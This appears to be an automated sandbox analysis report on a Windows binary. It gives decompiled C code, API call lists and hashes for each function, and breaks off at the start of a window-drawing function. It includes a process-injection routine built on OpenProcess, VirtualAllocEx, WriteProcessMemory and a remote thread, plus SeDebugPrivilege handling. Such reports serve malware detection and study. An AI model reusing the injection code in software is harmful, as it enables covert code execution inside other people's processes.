                                                                                                                0x00409e08
                                                                                                                0x00409e08
                                                                                                                0x00409e19
                                                                                                                0x00409e37
                                                                                                                0x00409e37
                                                                                                                0x00409e81

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409E08
                                                                                                                  • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                  • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                • memset.MSVCRT ref: 00409E3B
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1127616056-0
                                                                                                                • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                0x00404951
                                                                                                                0x00404952
                                                                                                                0x00404956
                                                                                                                0x004049a1
                                                                                                                0x00404958
                                                                                                                0x00404959
                                                                                                                0x0040495b
                                                                                                                0x0040495b
                                                                                                                0x0040495f
                                                                                                                0x00404961
                                                                                                                0x00404963
                                                                                                                0x0040496d
                                                                                                                0x00404975
                                                                                                                0x00404977
                                                                                                                0x0040497b
                                                                                                                0x00404985
                                                                                                                0x0040498a
                                                                                                                0x0040498e
                                                                                                                0x00404993
                                                                                                                0x0040499d
                                                                                                                0x0040499d

                                                                                                                APIs
                                                                                                                • malloc.MSVCRT ref: 0040496D
                                                                                                                • memcpy.MSVCRT ref: 00404985
                                                                                                                • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: freemallocmemcpy
                                                                                                                • String ID: W@
                                                                                                                • API String ID: 3056473165-1729568415
                                                                                                                • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                                0x0040543f
                                                                                                                0x00405456
                                                                                                                0x00405462
                                                                                                                0x00405467
                                                                                                                0x0040546d
                                                                                                                0x00405478
                                                                                                                0x00405489
                                                                                                                0x0040548d
                                                                                                                0x00000000
                                                                                                                0x00405492
                                                                                                                0x00405496

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                  • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                  • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                • wcscat.MSVCRT ref: 00405478
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3725422290-0
                                                                                                                • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                                  • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                                  • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                                  • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4232544981-0
                                                                                                                • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                                                • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                                0x00408f4c
                                                                                                                0x00408f57
                                                                                                                0x00408f60
                                                                                                                0x00408f62
                                                                                                                0x00408f67
                                                                                                                0x00408f67
                                                                                                                0x00408f71

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 187924719-0
                                                                                                                • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                0x004098fa
                                                                                                                0x004098fc
                                                                                                                0x00409901
                                                                                                                0x00409907
                                                                                                                0x00000000
                                                                                                                0x0040991c
                                                                                                                0x00409918
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859505661-0
                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                                0x004095da
                                                                                                                0x004095da
                                                                                                                0x004095de
                                                                                                                0x004095e1
                                                                                                                0x004095e7
                                                                                                                0x004095e7
                                                                                                                0x004095ee
                                                                                                                0x004095fc

                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                                0x0040a3d0
                                                                                                                0x0040a3d9

                                                                                                                APIs
                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: EnumNamesResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3334572018-0
                                                                                                                • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                                                0x0040a474
                                                                                                                0x0040a47b
                                                                                                                0x0040a48a
                                                                                                                0x0040a48d
                                                                                                                0x0040a48f
                                                                                                                0x0040a497
                                                                                                                0x0040a49a
                                                                                                                0x0040a6f7
                                                                                                                0x0040a6f9
                                                                                                                0x0040a700
                                                                                                                0x0040a700
                                                                                                                0x0040a4ad
                                                                                                                0x0040a4b3
                                                                                                                0x0040a4b8
                                                                                                                0x0040a4c6
                                                                                                                0x0040a4cc
                                                                                                                0x0040a4cf
                                                                                                                0x0040a4dd
                                                                                                                0x0040a4e2
                                                                                                                0x0040a4e3
                                                                                                                0x0040a4ea
                                                                                                                0x0040a4e5
                                                                                                                0x0040a4e5
                                                                                                                0x0040a4e5
                                                                                                                0x0040a4ec
                                                                                                                0x0040a4f6
                                                                                                                0x0040a4fe
                                                                                                                0x0040a503
                                                                                                                0x0040a504
                                                                                                                0x0040a50b
                                                                                                                0x0040a506
                                                                                                                0x0040a506
                                                                                                                0x0040a506
                                                                                                                0x0040a50d
                                                                                                                0x0040a512
                                                                                                                0x0040a518
                                                                                                                0x0040a51c
                                                                                                                0x0040a523
                                                                                                                0x0040a523
                                                                                                                0x0040a523
                                                                                                                0x0040a528
                                                                                                                0x0040a537
                                                                                                                0x0040a54c
                                                                                                                0x0040a539
                                                                                                                0x0040a544
                                                                                                                0x0040a549
                                                                                                                0x0040a558
                                                                                                                0x0040a56d
                                                                                                                0x0040a55a
                                                                                                                0x0040a565
                                                                                                                0x0040a56a
                                                                                                                0x0040a579
                                                                                                                0x0040a591
                                                                                                                0x0040a57b
                                                                                                                0x0040a589
                                                                                                                0x0040a58e
                                                                                                                0x0040a5b4
                                                                                                                0x0040a5b7
                                                                                                                0x0040a5cc
                                                                                                                0x0040a5cf
                                                                                                                0x0040a5d4
                                                                                                                0x0040a5d7
                                                                                                                0x0040a6ed
                                                                                                                0x0040a5e5
                                                                                                                0x0040a5fa
                                                                                                                0x0040a60b
                                                                                                                0x0040a61a
                                                                                                                0x0040a620
                                                                                                                0x0040a623
                                                                                                                0x0040a62b
                                                                                                                0x0040a62f
                                                                                                                0x0040a632
                                                                                                                0x0040a659
                                                                                                                0x0040a634
                                                                                                                0x0040a635
                                                                                                                0x0040a641
                                                                                                                0x0040a648
                                                                                                                0x0040a648
                                                                                                                0x0040a668
                                                                                                                0x0040a66e
                                                                                                                0x0040a685
                                                                                                                0x0040a69e
                                                                                                                0x0040a6a8
                                                                                                                0x0040a6ad
                                                                                                                0x0040a6bd
                                                                                                                0x0040a6c5
                                                                                                                0x0040a6c8
                                                                                                                0x0040a6d0
                                                                                                                0x0040a6d1
                                                                                                                0x0040a6d2
                                                                                                                0x0040a6d3
                                                                                                                0x0040a6d3
                                                                                                                0x0040a6c8
                                                                                                                0x0040a6d7
                                                                                                                0x0040a6dc
                                                                                                                0x0040a6dc
                                                                                                                0x0040a6d7
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                • memset.MSVCRT ref: 0040A4B3
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                • memset.MSVCRT ref: 0040A66E
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                • API String ID: 1572607441-20550370
                                                                                                                • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
